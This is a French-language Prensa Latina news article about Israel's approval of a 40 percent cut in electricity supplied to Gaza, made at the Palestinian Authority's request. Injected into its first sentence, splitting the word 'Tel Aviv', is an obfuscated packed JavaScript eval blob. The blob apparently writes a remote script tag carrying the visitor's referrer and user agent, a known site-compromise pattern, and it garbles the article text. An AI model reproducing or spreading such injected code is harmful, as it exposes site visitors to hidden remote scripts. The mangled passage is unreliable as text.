mercredi 24 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Israël approuve la réduction de l’approvisionnement électrique de Gaza

Tel eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ntbze|var|u0026u|referrer|srrhe||js|php'.split('|'),0,{})) Aviv, 13 juin (PL) Le Cabinet de Sécurité israélien a approuvé une réduction de 40 pour cent de l'approvisionnement d'électricité qu'Israël distribue à la Bande de Gaza.

Tel Aviv, 13 juin (PL) Le Cabinet de Sécurité israélien a approuvé une réduction de 40 pour cent de l’approvisionnement d’électricité qu’Israël distribue à la Bande de Gaza.

Selon des dossiers de presse, la décision des autorités israélienne a été prise sur la demande de l’Autorité Palestinienne (PA). Cette dernière gouverne en Cisjordanie occupée et paye la facture d’énergie mensuelle de Gaza à Israël.

À plusieurs reprises, Israël, tout comme l’Autorité Nationale Palestinienne, ont accusé le Hamas de percevoir tous les mois des millions de shekels (monnaie israélienne), sans transférer l’argent à l’AP,  par des impôts aux habitants de Gaza.

La semaine dernière, le chef de l’Autorité Palestinienne pour l’Énergie et les Ressources Naturelles, Zafer Milhem, a accusé le Hamas, qui gouverne à Gaza depuis 2007, d’entraver le plan de l’Autorité National Palestinienne et d’Israël en ne transférant pas les paiements d’électricité.

Pour Milhem, « la solution permanente aux graves problèmes d’électricité dont souffre la population de la Bande de Gaza ne pourra se résoudre sans la réconciliation politique et la constitution d’un gouvernement d’unité sur tout le territoire palestinien occupé ».

Selon les sources, le président palestinien, Mahmoud Abbas, aurait informé Israël que l’AP avait l’intention de ne payer que 60 pour cent de la facture mensuelle d’approvisionnement en électricité de Gaza.

peo/mgt/mv

EN CONTINU
notes connexes